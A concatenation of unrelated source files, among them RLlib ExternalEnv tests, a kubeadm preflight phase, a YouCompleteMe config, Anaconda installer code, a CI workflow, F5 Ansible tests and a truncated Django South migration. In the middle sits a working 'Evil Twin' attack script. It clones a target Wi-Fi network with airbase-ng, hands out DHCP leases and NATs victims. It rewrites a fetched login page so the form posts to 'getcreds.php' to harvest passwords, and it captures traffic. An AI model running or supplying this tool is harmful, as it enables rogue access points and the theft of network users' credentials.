('stoqs_os2016', 'CANON/loadCANON_os2016.py'),
('stoqs_cce2015', 'CCE/loadCCE_2015.py'),
('stoqs_michigan2016', 'LakeMichigan/load_2016.py'),
('stoqs_canon_september2016', 'CANON/loadCANON_september2016.py'),
('stoqs_os2017', 'CANON/loadCANON_os2017.py'),
('stoqs_canon_april2017', 'CANON/loadCANON_april2017.py'),
('stoqs_ps2017', 'CANON/loadCANON_postSeason2017.py'),
('stoqs_canon_september2017', 'CANON/loadCANON_september2017.py'),
('stoqs_os2018', 'CANON/loadCANON_os2018.py'),
('stoqs_canon_may2018', 'CANON/loadCANON_may2018.py'),
('stoqs_all_dorado', 'PlanktonProxies/load_all_dorado.py'),
('stoqs_canon_september2018', 'CANON/loadCANON_september2018.py'),
])
|
unknown
|
codeparrot/codeparrot-clean
| ||
import gym
import numpy as np
import random
import unittest
import uuid
import ray
from ray.rllib.agents.dqn import DQNTrainer
from ray.rllib.agents.pg import PGTrainer
from ray.rllib.evaluation.rollout_worker import RolloutWorker
from ray.rllib.env.external_env import ExternalEnv
from ray.rllib.tests.test_rollout_worker import (BadPolicy, MockPolicy,
MockEnv)
from ray.rllib.utils.test_utils import framework_iterator
from ray.tune.registry import register_env
def make_simple_serving(multiagent, superclass):
class SimpleServing(superclass):
def __init__(self, env):
superclass.__init__(self, env.action_space, env.observation_space)
self.env = env
def run(self):
eid = self.start_episode()
obs = self.env.reset()
while True:
action = self.get_action(eid, obs)
obs, reward, done, info = self.env.step(action)
if multiagent:
self.log_returns(eid, reward)
else:
self.log_returns(eid, reward, info=info)
if done:
self.end_episode(eid, obs)
obs = self.env.reset()
eid = self.start_episode()
return SimpleServing
# generate & register SimpleServing class
SimpleServing = make_simple_serving(False, ExternalEnv)
class PartOffPolicyServing(ExternalEnv):
def __init__(self, env, off_pol_frac):
ExternalEnv.__init__(self, env.action_space, env.observation_space)
self.env = env
self.off_pol_frac = off_pol_frac
def run(self):
eid = self.start_episode()
obs = self.env.reset()
while True:
if random.random() < self.off_pol_frac:
action = self.env.action_space.sample()
self.log_action(eid, obs, action)
else:
action = self.get_action(eid, obs)
obs, reward, done, info = self.env.step(action)
self.log_returns(eid, reward, info=info)
if done:
self.end_episode(eid, obs)
obs = self.env.reset()
eid = self.start_episode()
class SimpleOffPolicyServing(ExternalEnv):
def __init__(self, env, fixed_action):
ExternalEnv.__init__(self, env.action_space, env.observation_space)
self.env = env
self.fixed_action = fixed_action
def run(self):
eid = self.start_episode()
obs = self.env.reset()
while True:
action = self.fixed_action
self.log_action(eid, obs, action)
obs, reward, done, info = self.env.step(action)
self.log_returns(eid, reward, info=info)
if done:
self.end_episode(eid, obs)
obs = self.env.reset()
eid = self.start_episode()
class MultiServing(ExternalEnv):
def __init__(self, env_creator):
self.env_creator = env_creator
self.env = env_creator()
ExternalEnv.__init__(self, self.env.action_space,
self.env.observation_space)
def run(self):
envs = [self.env_creator() for _ in range(5)]
cur_obs = {}
eids = {}
while True:
active = np.random.choice(range(5), 2, replace=False)
for i in active:
if i not in cur_obs:
eids[i] = uuid.uuid4().hex
self.start_episode(episode_id=eids[i])
cur_obs[i] = envs[i].reset()
actions = [self.get_action(eids[i], cur_obs[i]) for i in active]
for i, action in zip(active, actions):
obs, reward, done, _ = envs[i].step(action)
cur_obs[i] = obs
self.log_returns(eids[i], reward)
if done:
self.end_episode(eids[i], obs)
del cur_obs[i]
class TestExternalEnv(unittest.TestCase):
@classmethod
def setUpClass(cls) -> None:
ray.init(ignore_reinit_error=True)
@classmethod
def tearDownClass(cls) -> None:
ray.shutdown()
def test_external_env_complete_episodes(self):
ev = RolloutWorker(
env_creator=lambda _: SimpleServing(MockEnv(25)),
policy=MockPolicy,
rollout_fragment_length=40,
batch_mode="complete_episodes")
for _ in range(3):
batch = ev.sample()
self.assertEqual(batch.count, 50)
def test_external_env_truncate_episodes(self):
ev = RolloutWorker(
env_creator=lambda _: SimpleServing(MockEnv(25)),
policy=MockPolicy,
rollout_fragment_length=40,
batch_mode="truncate_episodes")
for _ in range(3):
batch = ev.sample()
self.assertEqual(batch.count, 40)
def test_external_env_off_policy(self):
ev = RolloutWorker(
env_creator=lambda _: SimpleOffPolicyServing(MockEnv(25), 42),
policy=MockPolicy,
rollout_fragment_length=40,
batch_mode="complete_episodes")
for _ in range(3):
batch = ev.sample()
self.assertEqual(batch.count, 50)
self.assertEqual(batch["actions"][0], 42)
self.assertEqual(batch["actions"][-1], 42)
def test_external_env_bad_actions(self):
ev = RolloutWorker(
env_creator=lambda _: SimpleServing(MockEnv(25)),
policy=BadPolicy,
sample_async=True,
rollout_fragment_length=40,
batch_mode="truncate_episodes")
self.assertRaises(Exception, lambda: ev.sample())
def test_train_cartpole_off_policy(self):
register_env(
"test3", lambda _: PartOffPolicyServing(
gym.make("CartPole-v0"), off_pol_frac=0.2))
config = {
"num_workers": 0,
"exploration_config": {
"epsilon_timesteps": 100
},
}
for _ in framework_iterator(config, frameworks=("tf", "torch")):
dqn = DQNTrainer(env="test3", config=config)
reached = False
for i in range(50):
result = dqn.train()
print("Iteration {}, reward {}, timesteps {}".format(
i, result["episode_reward_mean"],
result["timesteps_total"]))
if result["episode_reward_mean"] >= 80:
reached = True
break
if not reached:
raise Exception("failed to improve reward")
def test_train_cartpole(self):
register_env("test", lambda _: SimpleServing(gym.make("CartPole-v0")))
config = {"num_workers": 0}
for _ in framework_iterator(config, frameworks=("tf", "torch")):
pg = PGTrainer(env="test", config=config)
reached = False
for i in range(80):
result = pg.train()
print("Iteration {}, reward {}, timesteps {}".format(
i, result["episode_reward_mean"],
result["timesteps_total"]))
if result["episode_reward_mean"] >= 80:
reached = True
break
if not reached:
raise Exception("failed to improve reward")
def test_train_cartpole_multi(self):
register_env("test2",
lambda _: MultiServing(lambda: gym.make("CartPole-v0")))
config = {"num_workers": 0}
for _ in framework_iterator(config, frameworks=("tf", "torch")):
pg = PGTrainer(env="test2", config=config)
reached = False
for i in range(80):
result = pg.train()
print("Iteration {}, reward {}, timesteps {}".format(
i, result["episode_reward_mean"],
result["timesteps_total"]))
if result["episode_reward_mean"] >= 80:
reached = True
break
if not reached:
raise Exception("failed to improve reward")
def test_external_env_horizon_not_supported(self):
ev = RolloutWorker(
env_creator=lambda _: SimpleServing(MockEnv(25)),
policy=MockPolicy,
episode_horizon=20,
rollout_fragment_length=10,
batch_mode="complete_episodes")
self.assertRaises(ValueError, lambda: ev.sample())
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", __file__]))
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
Copyright 2019 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package phases
import (
"fmt"
"k8s.io/klog/v2"
"k8s.io/kubernetes/cmd/kubeadm/app/cmd/options"
"k8s.io/kubernetes/cmd/kubeadm/app/cmd/phases/workflow"
"k8s.io/kubernetes/cmd/kubeadm/app/cmd/util"
"k8s.io/kubernetes/cmd/kubeadm/app/preflight"
"k8s.io/kubernetes/cmd/kubeadm/app/util/errors"
)
// NewPreflightPhase creates a kubeadm workflow phase implements preflight checks for reset
func NewPreflightPhase() workflow.Phase {
return workflow.Phase{
Name: "preflight",
Aliases: []string{"pre-flight"},
Short: "Run reset pre-flight checks",
Long: "Run pre-flight checks for kubeadm reset.",
Run: runPreflight,
InheritFlags: []string{
options.IgnorePreflightErrors,
options.Force,
options.DryRun,
},
}
}
// runPreflight executes preflight checks logic.
func runPreflight(c workflow.RunData) error {
r, ok := c.(resetData)
if !ok {
return errors.New("preflight phase invoked with an invalid data struct")
}
if !r.ForceReset() && !r.DryRun() {
klog.Warning("[reset] WARNING: Changes made to this host by 'kubeadm init' or 'kubeadm join' will be reverted.")
if err := util.InteractivelyConfirmAction("reset", "Are you sure you want to proceed?", r.InputReader()); err != nil {
return err
}
}
fmt.Println("[preflight] Running pre-flight checks")
return preflight.RunRootCheckOnly(r.IgnorePreflightErrors())
}
|
go
|
github
|
https://github.com/kubernetes/kubernetes
|
cmd/kubeadm/app/cmd/phases/reset/preflight.go
|
import os
import ycm_core
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
'-Werror',
'-pendantic-errors',
'-std=c++0x',
'-fno-strict-aliasing',
'-O3',
'-DNDEBUG',
# ...and the same thing goes for the magic -x option which specifies the
# language that the files to be compiled are written in. This is mostly
# relevant for c++ headers.
# For a C project, you would set this to 'c' instead of 'c++'.
'-x', 'c++',
'-I', 'include',
'-isystem', '/usr/include',
'-isystem', '/usr/local/include',
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.cc' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return {
'flags': final_flags,
'do_cache': True
}
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/python
#
# anaconda: The Red Hat Linux Installation program
#
# Copyright (C) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007
# Red Hat, Inc. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Author(s): Brent Fox <bfox@redhat.com>
# Mike Fulbright <msf@redhat.com>
# Jakub Jelinek <jakub@redhat.com>
# Jeremy Katz <katzj@redhat.com>
# Chris Lumens <clumens@redhat.com>
# Paul Nasrat <pnasrat@redhat.com>
# Erik Troan <ewt@rpath.com>
# Matt Wilson <msw@rpath.com>
#
import os
import sys
from tempfile import mkstemp
from pyanaconda.bootloader import get_bootloader
from pyanaconda import iutil
from pyanaconda.constants import ADDON_PATHS
from pyanaconda import addons
import logging
log = logging.getLogger("anaconda")
stdoutLog = logging.getLogger("anaconda.stdout")
class Anaconda(object):
def __init__(self):
from pyanaconda import desktop
self._bootloader = None
self.canReIPL = False
self.desktop = desktop.Desktop()
self.dir = None
self.displayMode = None
self.extraModules = []
self.id = None
self._instClass = None
self._intf = None
self.isHeadless = False
self.ksdata = None
self.mediaDevice = None
self.methodstr = None
self._network = None
self.opts = None
self._payload = None
self.proxy = None
self.proxyUsername = None
self.proxyPassword = None
self.reIPLMessage = None
self.rescue_mount = True
self.rootParts = None
self.stage2 = None
self._storage = None
self.updateSrc = None
self.mehConfig = None
# *sigh* we still need to be able to write this out
self.xdriver = None
@property
def bootloader(self):
if not self._bootloader:
self._bootloader = get_bootloader()
return self._bootloader
@property
def instClass(self):
if not self._instClass:
from pyanaconda.installclass import DefaultInstall
self._instClass = DefaultInstall()
return self._instClass
def _getInterface(self):
return self._intf
def _setInterface(self, v):
# "lambda cannot contain assignment"
self._intf = v
def _delInterface(self):
del self._intf
intf = property(_getInterface, _setInterface, _delInterface)
@property
def payload(self):
# Try to find the packaging payload class. First try the install
# class. If it doesn't give us one, fall back to the default.
if not self._payload:
klass = self.instClass.getBackend()
if not klass:
from pyanaconda.flags import flags
if self.ksdata.ostreesetup.seen:
from pyanaconda.packaging.rpmostreepayload import RPMOSTreePayload
klass = RPMOSTreePayload
elif flags.livecdInstall:
from pyanaconda.packaging.livepayload import LiveImagePayload
klass = LiveImagePayload
elif self.ksdata.method.method == "liveimg":
from pyanaconda.packaging.livepayload import LiveImageKSPayload
klass = LiveImageKSPayload
else:
from pyanaconda.packaging.yumpayload import YumPayload
klass = YumPayload
self._payload = klass(self.ksdata)
return self._payload
@property
def protected(self):
import stat
specs = []
if os.path.exists("/run/initramfs/livedev") and \
stat.S_ISBLK(os.stat("/run/initramfs/livedev")[stat.ST_MODE]):
specs.append(os.readlink("/run/initramfs/livedev"))
if self.methodstr and self.methodstr.startswith("hd:"):
specs.append(self.methodstr[3:].split(":", 3)[0])
if self.stage2 and self.stage2.startswith("hd:"):
specs.append(self.stage2[3:].split(":", 3)[0])
return specs
@property
def storage(self):
if not self._storage:
import blivet
self._storage = blivet.Blivet(ksdata=self.ksdata)
if self.instClass.defaultFS:
self._storage.setDefaultFSType(self.instClass.defaultFS)
return self._storage
def dumpState(self):
from meh import ExceptionInfo
from meh.dump import ReverseExceptionDump
from inspect import stack as _stack
from traceback import format_stack
# Skip the frames for dumpState and the signal handler.
stack = _stack()[2:]
stack.reverse()
exn = ReverseExceptionDump(ExceptionInfo(None, None, stack),
self.mehConfig)
# gather up info on the running threads
threads = "\nThreads\n-------\n"
for thread_id, frame in sys._current_frames().iteritems():
threads += "\nThread %s\n" % (thread_id,)
threads += "".join(format_stack(frame))
# dump to a unique file
(fd, filename) = mkstemp(prefix="anaconda-tb-", dir="/tmp")
dump_text = exn.traceback_and_object_dump(self)
dump_text += threads
dump_text = dump_text.encode("utf-8")
os.write(fd, dump_text)
os.close(fd)
# append to a given file
with open("/tmp/anaconda-tb-all.log", "a+") as f:
f.write("--- traceback: %s ---\n" % filename)
f.write(dump_text + "\n")
def initInterface(self, addon_paths=None):
if self._intf:
raise RuntimeError("Second attempt to initialize the InstallInterface")
if self.displayMode == 'g':
from pyanaconda.ui.gui import GraphicalUserInterface
self._intf = GraphicalUserInterface(self.storage, self.payload,
self.instClass)
# needs to be refreshed now we know if gui or tui will take place
addon_paths = addons.collect_addon_paths(ADDON_PATHS,
ui_subdir="gui")
elif self.displayMode in ['t', 'c']: # text and command line are the same
from pyanaconda.ui.tui import TextUserInterface
self._intf = TextUserInterface(self.storage, self.payload,
self.instClass)
# needs to be refreshed now we know if gui or tui will take place
addon_paths = addons.collect_addon_paths(ADDON_PATHS,
ui_subdir="tui")
else:
raise RuntimeError("Unsupported displayMode: %s" % self.displayMode)
if addon_paths:
self._intf.update_paths(addon_paths)
def writeXdriver(self, root = None):
# this should go away at some point, but until it does, we
# need to keep it around.
if self.xdriver is None:
return
if root is None:
root = iutil.getSysroot()
if not os.path.isdir("%s/etc/X11" %(root,)):
os.makedirs("%s/etc/X11" %(root,), mode=0755)
f = open("%s/etc/X11/xorg.conf" %(root,), 'w')
f.write('Section "Device"\n\tIdentifier "Videocard0"\n\tDriver "%s"\nEndSection\n' % self.xdriver)
f.close()
|
unknown
|
codeparrot/codeparrot-clean
| ||
name: 🧪 Test
on:
push:
branches:
- main
- dev
tags-ignore:
- v*
paths-ignore:
- "docs/**"
- "**/README.md"
pull_request:
paths-ignore:
- "docs/**"
- "**/*.md"
concurrency:
group: ${{ github.workflow }}-${{ github.ref }}
cancel-in-progress: true
jobs:
test:
name: "🧪 Test: (Node: ${{ matrix.node }})"
strategy:
fail-fast: false
matrix:
node:
- 20.18
- 22
runs-on: ubuntu-latest
steps:
- name: ⬇️ Checkout repo
uses: actions/checkout@v6
- name: 📦 Setup pnpm
uses: pnpm/action-setup@v4
- name: ⎔ Setup node
uses: actions/setup-node@v6
with:
node-version: ${{ matrix.node }}
cache: pnpm
check-latest: true
# TODO: Track and renable once this has been fixed: https://github.com/google/wireit/issues/1297
# - uses: google/wireit@setup-github-actions-caching/v2
- name: Disable GitHub Actions Annotations
run: |
echo "::remove-matcher owner=tsc::"
echo "::remove-matcher owner=eslint-compact::"
echo "::remove-matcher owner=eslint-stylish::"
- name: 📥 Install deps
run: pnpm install --frozen-lockfile
- name: 🏗 Build
run: pnpm build
- name: 🔍 Typecheck
run: pnpm typecheck
- name: 🔬 Lint
run: pnpm lint
- name: 🧪 Run tests
run: pnpm test
|
unknown
|
github
|
https://github.com/remix-run/react-router
|
.github/workflows/test.yml
|
from scapy.all import *
import os
import time
from subprocess import *
print '*'*20
print '*'*20
print 'Evil Twin Attack Reburn'
import create_db_hotspot
import urllib2, httplib, redirecthandle
####### SET UP A MONITORING INTERFACE
print '*'*20
print 'Creating a monitoring interface'
output = Popen(["iwconfig"], stdout=PIPE).communicate()[0]
wireless_interface = ""
mon_iface = ""
if "wlan" in output:
#print "The network inteface is: " + output[0:5]
wireless_interface = output[0:6].strip()
print "\n\n"
print "EVIL TWIN ATTACK"
print "\n\n"
print "Using wireless interface:::" + wireless_interface
print "\n\n"
mon_interface = Popen(["airmon-ng", "start", wireless_interface], stdout=PIPE).communicate()[0]
if 'mon' in mon_interface:
print mon_interface[-33:-1].strip()
mon_iface = mon_interface[-7:-2].strip(")")
print '*'*20
print "SCANNING FOR WIRELESS NETWORKS"
print '*'*20
print "press Ctrl+C to stop scanning"
######## SCAN FOR SSID
app_list = []
def PacketHandler(pkt):
if pkt.haslayer(Dot11):
if pkt.type == 0 and pkt.subtype==8:
if pkt.addr2 not in app_list:
app_list.append(pkt.addr2)
print "AP MAC: %s with SSID: %s " %(pkt.addr2, pkt.info)
sniff(iface=mon_iface, prn= PacketHandler)
######## making a backup of DHCPD
print '*'*20
print "making a backup of DHCPD"
os.system("mv /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.backup")
##### creating a DHCPD script
print '*'*20
print "creating a DHCPD script"
dhcpd_file = open("/etc/dhcp/dhcpd.conf", "wb")
dhcpd_file.write("authoritative;\ndefault-lease-time 600;\nmax-lease-time 7200;\nsubnet 192.168.1.128 netmask 255.255.255.128 {\n\toption subnet-mask 192.168.1.128;\n\toption broadcast-address 192.168.1.255;\n\toption routers 192.168.1.129;\n\toption domain-name-servers 8.8.8.8;\n\trange 192.168.1.130 192.168.1.140;\n}")
dhcpd_file.close()
# GET USER INPUT FOR SSID
SSID = raw_input('Enter the target SSID: ')
CHANNEL = raw_input('Enter the channel for SSID: ')
################ CONNECT TO WIRELESS NETWORK #########
def connect_wireless():
os.system("iwconfig "+wireless_interface+" essid " + SSID)
#os.system("sudo iw dev "+wireless_interface+" disconnect")
print '*'*20
print 'Connected to :' + SSID + ' on interface ' + wireless_interface
time.sleep(5)
####### HANDLE REDIRECT
def get_login_page():
httplib.HTTPConnection.debuglevel=1
request = urllib2.Request('https://gmail.com/')
opener = urllib2.build_opener(redirecthandle.SmartRedirectHandler())
f = opener.open(request)
#article = re.sub(r'(?is)</html>.+', '</html>', article)
redirect = f.url
#response = urllib2.urlopen('https://google.com')
html = f.read()
print "Found the login page here: " + f.url
########## regex search and replace
regex = re.search(r'action="([^"]*)".*?', html)
post_action = str(regex.group(0))
print "*" * 20
print 'modifying the login page...'
new_login = html.replace(post_action, 'action=getcreds.php')
##### create a login page
index_page = open('/var/www/index.html','wb')
index_page.write(new_login)
index_page.close()
time.sleep(10)
########## CONNECTING TO THE WIRELESS NETWORK
connect_wireless()
######## getting login page
print '*'*20
print 'Getting login page'
get_login_page()
os.system('firefox http://localhost/index.html &')
# CREATE A HOTSPOT IN A NEW TERMINAL
time.sleep(3)
print '*'*20
print "Creating a hotspot"
os.system("gnome-terminal -x airbase-ng -e '"+SSID+"' -c "+str(CHANNEL)+" -P "+mon_iface+" &")
internet_ip = raw_input('Enter the outbound IP address: ')
print '*'*20
print 'Setting up DHCP Server'
########### SETTING UP THE DHCPD SERVER
os.system("ifconfig at0 up")
os.system("ifconfig at0 192.168.1.129 netmask 255.255.255.128")
os.system("route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129")
######### setting up a NAT
print '*'*20
print "setting up a NAT rules\n"
os.system("iptables --flush")
os.system("iptables --table nat --flush")
os.system("iptables --delete-chain")
os.system("iptables --table nat --delete-chain")
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
os.system("iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE")
os.system("iptables --append FORWARD --in-interface at0 -j ACCEPT")
os.system("iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination "+internet_ip+":80")
os.system("iptables -t nat -A POSTROUTING -j MASQUERADE")
############# SETTING UP DHCP SERVER
print '*'*20
print 'Setting up DHCP Server for Client'
print '*'*20
time.sleep(3)
os.system("/usr/sbin/dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0")
time.sleep(3)
os.system("/etc/init.d/isc-dhcp-server start")
########## CREATING AIRDUMP
print "CREATING AIRDUMP\n"
print '*'*20
os.system("mkdir capture")
os.system("gnome-terminal -x airodump-ng -c "+CHANNEL+" mon0 -w capture/"+SSID)
############# STOP MONITORING INTERFACE
print '*'*20
cancel_command = str(raw_input('Enter quit() to exit the application\n'))
while cancel_command != 'quit()':
cancel_command = str(raw_input('Enter quit() to exit the application\n'))
print '*'*20
print 'Stopping the monitoring interface'
os.system("airmon-ng stop " + mon_iface)
os.system("ifconfig at0 down")
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2017, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
import sys
from nose.plugins.skip import SkipTest
if sys.version_info < (2, 7):
raise SkipTest("F5 Ansible modules require Python >= 2.7")
from units.compat import unittest
from units.compat.mock import Mock
from units.compat.mock import patch
from ansible.module_utils.basic import AnsibleModule
try:
from library.modules.bigip_remote_role import ApiParameters
from library.modules.bigip_remote_role import ModuleParameters
from library.modules.bigip_remote_role import ModuleManager
from library.modules.bigip_remote_role import ArgumentSpec
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import iControlUnexpectedHTTPError
from test.unit.modules.utils import set_module_args
except ImportError:
try:
from ansible.modules.network.f5.bigip_remote_role import ApiParameters
from ansible.modules.network.f5.bigip_remote_role import ModuleParameters
from ansible.modules.network.f5.bigip_remote_role import ModuleManager
from ansible.modules.network.f5.bigip_remote_role import ArgumentSpec
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import iControlUnexpectedHTTPError
from units.modules.utils import set_module_args
except ImportError:
raise SkipTest("F5 Ansible modules require the f5-sdk Python library")
fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures')
fixture_data = {}
def load_fixture(name):
path = os.path.join(fixture_path, name)
if path in fixture_data:
return fixture_data[path]
with open(path) as f:
data = f.read()
try:
data = json.loads(data)
except Exception:
pass
fixture_data[path] = data
return data
class TestParameters(unittest.TestCase):
def test_module_parameters(self):
args = dict(
terminal_access='none',
)
p = ModuleParameters(params=args)
assert p.terminal_access == 'disable'
def test_api_parameters(self):
args = load_fixture('load_auth_remote_role_role_info_1.json')
p = ApiParameters(params=args)
assert p.terminal_access == 'disable'
class TestManager(unittest.TestCase):
def setUp(self):
self.spec = ArgumentSpec()
def test_create_remote_syslog(self, *args):
set_module_args(dict(
name='foo',
line_order=1000,
attribute_string='bar',
server='localhost',
password='password',
user='admin'
))
module = AnsibleModule(
argument_spec=self.spec.argument_spec,
supports_check_mode=self.spec.supports_check_mode
)
# Override methods in the specific type of manager
mm = ModuleManager(module=module)
mm.exists = Mock(side_effect=[False, True])
mm.create_on_device = Mock(return_value=True)
results = mm.exec_module()
assert results['changed'] is True
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Removing unique constraint on 'BadgeAssertion', fields ['course_id', 'user']
db.delete_unique('certificates_badgeassertion', ['course_id', 'user_id'])
# Adding unique constraint on 'BadgeAssertion', fields ['course_id', 'user', 'mode']
db.create_unique('certificates_badgeassertion', ['course_id', 'user_id', 'mode'])
def backwards(self, orm):
# Removing unique constraint on 'BadgeAssertion', fields ['course_id', 'user', 'mode']
db.delete_unique('certificates_badgeassertion', ['course_id', 'user_id', 'mode'])
# Adding unique constraint on 'BadgeAssertion', fields ['course_id', 'user']
db.create_unique('certificates_badgeassertion', ['course_id', 'user_id'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'certificates.badgeassertion': {
'Meta': {'unique_together': "(('course_id', 'user', 'mode'),)", 'object_name': 'BadgeAssertion'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'default': 'None', 'max_length': '255', 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'default': "'{}'"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'certificates.badgeimageconfiguration': {
'Meta': {'object_name': 'BadgeImageConfiguration'},
'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'icon': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '125'})
},
'certificates.certificategenerationconfiguration': {
'Meta': {'ordering': "('-change_date',)", 'object_name': 'CertificateGenerationConfiguration'},
'change_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'certificates.certificategenerationcoursesetting': {
'Meta': {'object_name': 'CertificateGenerationCourseSetting'},
